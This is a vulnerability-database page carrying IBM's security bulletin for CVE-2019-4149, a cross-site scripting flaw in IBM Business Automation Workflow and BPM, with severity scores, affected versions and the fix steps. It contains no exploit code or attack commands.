Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
ibmIBM22FBAE9DD2C0110EB85935D48AA3CD08BA5B84CA575678E71FB6790B1644A150
HistorySep 14, 2022 - 3:02 p.m.

Security Bulletin: Cross-site scripting vulnerability in IBM Business Automation Workflow and IBM Business Process Manager (BPM) (CVE-2019-4149)

2022-09-1415:02:20
www.ibm.com
8
ibm
business automation workflow
bpm
cross-site scripting
vulnerability
credentials disclosure
web ui
javascript
fix
upgrade.

CVSS2

3.5

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

CVSS3

5.4

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

19.6%

JSON

Summary

A cross-site scripting vulnerability in IBM Business Automation Workflow and IBM BPM has been found.

Vulnerability Details

CVEID: CVE-2019-4149 DESCRIPTION: IBM Business Automation Workflow is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.
CVSS Base Score: 5.4
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/158415&gt; for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)

Affected Products and Versions

- IBM Business Automation Workflow V18.0.0.0 through V18.0.0.2

- IBM Business Process Manager V8.6.0.0 through V8.6.0.0 Cumulative Fix 2018.03

- IBM Business Process Manager V8.5.7.0 through V8.5.7.0 Cumulative Fix 2017.06

- IBM Business Process Manager V8.5.6.0 through V8.5.6.0 CF2

Remediation/Fixes

Install interim fix JR60802 as appropriate for your current IBM Business Automation Workflow or IBM BPM version.

For IBM Business Automation Workflow V18.0.0.0 through V18.0.0.2
ยท Upgrade to at least IBM Business Automation Workflow V18.0.0.0 as required by iFix and then apply iFix JR60802
--ORโ€“
ยท Apply cumulative fix IBM Business Automation Workflow V19.0.0.1

For IBM BPM V8.6.0.0 through V8.6.0.0 CF 2018.03
ยท Upgrade to at least IBM BPM V8.6.0.0 CF 2017.12 as required by iFix and then apply iFix JR60802

For IBM BPM V8.5.7.0 through V8.5.7.0 CF 2017.06
ยท Apply Cumulative Fix 2017.06 and then apply iFix JR60802

For IBM BPM V8.5.6.0 through V8.5.6.0 CF2
ยท Apply CF2 as required by iFix and then apply iFix JR60802

Workarounds and Mitigations

None

Affected configurations

Vulners
Node
ibmbusiness_automation_workflowMatch18.0.0.0
OR
ibmbusiness_automation_workflowMatch18.0.0.1
OR
ibmbusiness_automation_workflowMatch18.0.0.2
OR
ibmbusiness_process_managerMatch8.6.0.
OR
ibmbusiness_process_managerMatch201803
OR
ibmbusiness_process_managerMatch8.6.0.
OR
ibmbusiness_process_managerMatch201712
OR
ibmbusiness_process_managerMatch8.6
OR
ibmbusiness_process_managerMatch8.5.7.advanced
OR
ibmbusiness_process_managerMatch201706advanced
OR
ibmbusiness_process_managerMatch8.5.7.advanced
OR
ibmbusiness_process_managerMatch201703advanced
OR
ibmbusiness_process_managerMatch8.5.7.advanced
OR
ibmbusiness_process_managerMatch201612advanced
OR
ibmbusiness_process_managerMatch8.5.7.advanced
OR
ibmbusiness_process_managerMatch201609advanced
OR
ibmbusiness_process_managerMatch8.5.7.advanced
OR
ibmbusiness_process_managerMatch201606advanced
OR
ibmbusiness_process_managerMatch8.5.7advanced
OR
ibmbusiness_process_managerMatch8.5.6.2advanced
OR
ibmbusiness_process_managerMatch8.5.6.1advanced
OR
ibmbusiness_process_managerMatch8.5.6advanced
OR
ibmbusiness_process_managerMatch8.6.0.express
OR
ibmbusiness_process_managerMatch201803express
OR
ibmbusiness_process_managerMatch8.6.0.express
OR
ibmbusiness_process_managerMatch201712express
OR
ibmbusiness_process_managerMatch8.6express
OR
ibmbusiness_process_managerMatch8.5.7.express
OR
ibmbusiness_process_managerMatch201706express
OR
ibmbusiness_process_managerMatch8.5.7.express
OR
ibmbusiness_process_managerMatch201703express
OR
ibmbusiness_process_managerMatch8.5.7.express
OR
ibmbusiness_process_managerMatch201612express
OR
ibmbusiness_process_managerMatch8.5.7.express
OR
ibmbusiness_process_managerMatch201609express
OR
ibmbusiness_process_managerMatch8.5.7.express
OR
ibmbusiness_process_managerMatch201606express
OR
ibmbusiness_process_managerMatch8.5.7express
OR
ibmbusiness_process_managerMatch8.5.6.2express
OR
ibmbusiness_process_managerMatch8.5.6.1express
OR
ibmbusiness_process_managerMatch8.5.6express
OR
ibmbusiness_process_managerMatch8.5.7.standard
OR
ibmbusiness_process_managerMatch201706standard
OR
ibmbusiness_process_managerMatch8.5.7.standard
OR
ibmbusiness_process_managerMatch201703standard
OR
ibmbusiness_process_managerMatch8.5.7.standard
OR
ibmbusiness_process_managerMatch201612standard
OR
ibmbusiness_process_managerMatch8.5.7.standard
OR
ibmbusiness_process_managerMatch201609standard
OR
ibmbusiness_process_managerMatch8.5.7.standard
OR
ibmbusiness_process_managerMatch201606standard
OR
ibmbusiness_process_managerMatch8.5.7standard
OR
ibmbusiness_process_managerMatch8.5.6.2standard
OR
ibmbusiness_process_managerMatch8.5.6.1standard
OR
ibmbusiness_process_managerMatch8.5.6standard
VendorProductVersionCPE
ibmbusiness_automation_workflow18.0.0.0cpe:2.3:a:ibm:business_automation_workflow:18.0.0.0:*:*:*:*:*:*:*
ibmbusiness_automation_workflow18.0.0.1cpe:2.3:a:ibm:business_automation_workflow:18.0.0.1:*:*:*:*:*:*:*
ibmbusiness_automation_workflow18.0.0.2cpe:2.3:a:ibm:business_automation_workflow:18.0.0.2:*:*:*:*:*:*:*
ibmbusiness_process_manager8.6.0.cpe:2.3:a:ibm:business_process_manager:8.6.0.:*:*:*:*:*:*:*
ibmbusiness_process_manager201803cpe:2.3:a:ibm:business_process_manager:201803:*:*:*:*:*:*:*
ibmbusiness_process_manager201712cpe:2.3:a:ibm:business_process_manager:201712:*:*:*:*:*:*:*
ibmbusiness_process_manager8.6cpe:2.3:a:ibm:business_process_manager:8.6:*:*:*:*:*:*:*
ibmbusiness_process_manager8.5.7.cpe:2.3:a:ibm:business_process_manager:8.5.7.:*:*:*:advanced:*:*:*
ibmbusiness_process_manager201706cpe:2.3:a:ibm:business_process_manager:201706:*:*:*:advanced:*:*:*
ibmbusiness_process_manager201703cpe:2.3:a:ibm:business_process_manager:201703:*:*:*:advanced:*:*:*
Rows per page:
1-10 of 411

Related

prion 1
nvd 1
cvelist 1
cve 1
prion
prion
Cross site scripting
2019-09-05 15:15:00
nvd
nvd
CVE-2019-4149
2019-09-05 15:15:12
cvelist
cvelist
CVE-2019-4149
2019-09-05 14:50:15
cve
cve
CVE-2019-4149
2019-09-05 15:15:12

CVSS2

3.5

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

SINGLE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:S/C:N/I:P/A:N

CVSS3

5.4

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

19.6%

JSON
Related for 22FBAE9DD2C0110EB85935D48AA3CD08BA5B84CA575678E71FB6790B1644A150
prion1nvd1cvelist1cve1